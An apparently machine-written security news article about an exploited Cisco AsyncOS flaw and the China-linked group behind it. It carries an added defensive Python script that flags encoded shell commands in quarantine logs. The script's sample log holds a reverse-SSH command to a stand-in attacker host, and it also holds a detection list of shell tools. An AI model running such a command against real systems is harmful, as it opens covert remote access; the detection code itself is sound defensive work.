

Ethical Hacking News

A Critical Flaw in Cisco AsyncOS Software Exposes Vulnerability to China-Linked APT Group UAT-9686



A critical flaw has been discovered in Cisco AsyncOS software, exposing vulnerable devices to exploitation by China-linked APT group UAT-9686. The vulnerability affects the Spam Quarantine feature of Secure Email Gateway and Secure Email and Web Manager appliances, allowing attackers to execute arbitrary commands with root privileges. Organizations must take immediate action to secure their devices and prevent similar attacks.



  • The Cisco AsyncOS software used by Secure Email Gateway and Secure Email and Web Manager appliances has a critical flaw (CVE-2025-20393) that allows attackers to execute arbitrary commands with root privileges.
  • Exposure has primarily affected email appliances running non-standard configurations, so organizations must secure their devices to prevent similar attacks.
  • A China-linked APT group, UAT-9686, is responsible for the attack campaign using custom tools like AquaShell and chisel to maintain stealth and long-term access to compromised systems.
  • The attack highlights the importance of regular security audits and vulnerability assessments, as well as implementing robust security measures such as encryption and multi-factor authentication.



Pierluigi Paganini, a renowned security expert and author of Security Affairs, has been tracking a series of cyberattacks that have targeted various organizations worldwide. The latest attack, which was discovered by Cisco's Talos security experts, has revealed a critical flaw in the AsyncOS software used by Secure Email Gateway and Secure Email and Web Manager appliances.

The vulnerability, tracked as CVE-2025-20393 (CVSS score of 10.0), affects the Spam Quarantine feature of these devices, allowing attackers to execute arbitrary commands on the underlying operating system with root privileges. This means that once an attacker gains access to a vulnerable device, they can install persistence, establish persistent reverse SSH access, and execute encoded shell commands sent via unauthenticated HTTP POST requests.

As outlined in Cisco's advisory, the attack vector exposes only Cisco AsyncOS email appliances running non-standard configurations. Analysis shows that misconfigurations play a key role in the exposure, so organizations must take extra precautions to secure their devices and prevent similar attacks in the future.

In December 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the zero-day flaw to its Known Exploited Vulnerabilities catalog, highlighting the severity of the issue. Cisco has since fixed the vulnerability by releasing patches for the affected releases, including those for Cisco Email Security Gateway and Secure Email and Web Manager appliances.

The attack campaign was launched by a China-linked APT group known as UAT-9686, which is also responsible for other notable attacks in recent months. The attackers employed custom tools, including AquaShell (a Python-based backdoor), AquaTunnel (reverse SSH tunnel), chisel (tunneling tool), and AquaPurge (log-clearing utility), to maintain stealth and long-term access to compromised systems.

The attack succeeded because of improper HTTP request validation in the Spam Quarantine feature, which highlights the importance of regular security audits and vulnerability assessments for organizations that use Cisco AsyncOS software. It also underscores the need to implement robust security measures, such as encryption, secure protocols, and multi-factor authentication, to prevent similar attacks.
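As an added example that is not part of the article and not code from Cisco, Talos or Security Affairs, the script below shows the kind of log triage a defender could run to surface the pattern described above: unauthenticated POST requests to the spam quarantine web interface whose parameters decode to a shell command. The tab-separated log format, the `/quarantine/` path prefix, the `SHELL_MARKERS` list and the choice of base64 as the encoding are all assumptions made for illustration; the sample log lines are constructed, not captured from an appliance.

```python
"""Triage helper: flag POSTs to a quarantine web UI that carry an encoded shell command.

Assumptions (not AsyncOS specifics): a tab-separated request log with the columns
timestamp, src_ip, user ('-' when unauthenticated), method, path, status, body;
a '/quarantine/' path prefix for the spam quarantine UI; base64 as the encoding.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Hypothetical path prefix of the spam quarantine web UI (placeholder).
QUARANTINE_PATH_PREFIX = "/quarantine/"

# Substrings that, once a payload is decoded, strongly suggest a shell command.
SHELL_MARKERS = ("/bin/sh", "bash -c", "sh -c", "ssh -R", "nohup ", "chmod +x", "curl ", "wget ")

# Candidate base64 tokens: long runs of the base64 alphabet with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Finding:
    timestamp: str
    src_ip: str
    path: str
    decoded: str                      # the decoded command that triggered the finding
    reasons: List[str] = field(default_factory=list)


def parse_line(line: str) -> Optional[dict]:
    """Parse one line of the assumed tab-separated request log; None if malformed."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 7:
        return None
    keys = ("timestamp", "src_ip", "user", "method", "path", "status", "body")
    return dict(zip(keys, parts))


def decode_shell_payloads(body: str) -> List[str]:
    """Return every base64 token in the body that decodes to printable text containing a shell marker."""
    hits = []
    for token in B64_TOKEN.findall(body):
        padded = token + "=" * (-len(token) % 4)   # re-pad in case '=' was stripped
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue                                # not valid base64 / not text: skip
        if text.isprintable() and any(m in text for m in SHELL_MARKERS):
            hits.append(text)
    return hits


def analyze(lines) -> List[Finding]:
    """Report POSTs to the quarantine UI whose body carries an encoded shell command."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] != "POST" or not rec["path"].startswith(QUARANTINE_PATH_PREFIX):
            continue
        decoded = decode_shell_payloads(rec["body"])
        if not decoded:
            continue                                # long base64 alone is not enough to alert
        reasons = ["base64 payload decodes to shell command"]
        if rec["user"] == "-":
            reasons.append("unauthenticated POST to quarantine UI")
        findings.append(Finding(rec["timestamp"], rec["src_ip"], rec["path"], decoded[0], reasons))
    return findings


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample log (not real appliance output), built inline so it runs offline.
SAMPLE_LOG = [
    "2026-01-16T05:20:01Z\t10.0.0.5\talice\tGET\t/quarantine/search\t200\t-",
    "2026-01-16T05:20:09Z\t10.0.0.5\talice\tPOST\t/quarantine/release\t200\taction=release&mid=12345",
    # Unauthenticated POST whose parameter decodes to a reverse-SSH command (should alert).
    "2026-01-16T05:21:44Z\t203.0.113.9\t-\tPOST\t/quarantine/login\t200\tq="
    + _b64("/bin/sh -c 'ssh -R 2222:127.0.0.1:22 u@203.0.113.9'"),
    # Unauthenticated POST with a long base64 value that is not a command (must not alert).
    "2026-01-16T05:22:10Z\t198.51.100.4\t-\tPOST\t/quarantine/login\t401\ttoken="
    + _b64("session-token-renewal-request"),
]


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f.timestamp} {f.src_ip} {f.path}: {'; '.join(f.reasons)} -> {f.decoded!r}")
```

The decode step is deliberately the gate: a long base64 value on its own (the fourth line) produces no finding, which keeps legitimate tokens out of the alert stream, while the reverse-SSH command in the third line is reported together with the fact that the request was unauthenticated. The marker list is a heuristic and should be tuned to the environment; the check complements, and does not replace, applying Cisco's patches and keeping the quarantine interface off untrusted networks.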

In conclusion, the discovery of this critical flaw in Cisco AsyncOS software has significant implications for organizations worldwide. The fact that only appliances running non-standard configurations have been compromised suggests that misconfigurations play a key role in exposure. As a result, it is essential for organizations to take proactive steps to secure their devices and prevent similar attacks in the future.



Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Critical-Flaw-in-Cisco-AsyncOS-Software-Exposes-Vulnerability-to-China-Linked-APT-Group-UAT-9686-ehn.shtml

  • https://securityaffairs.com/186985/apt/china-linked-apt-uat-9686-abused-now-patched-maximum-severity-asyncos-bug.html

  • https://nvd.nist.gov/vuln/detail/CVE-2025-20393

  • https://www.cvedetails.com/cve/CVE-2025-20393/


  • Published: Fri Jan 16 05:20:42 2026 by llama3.2 3B Q4_K_M












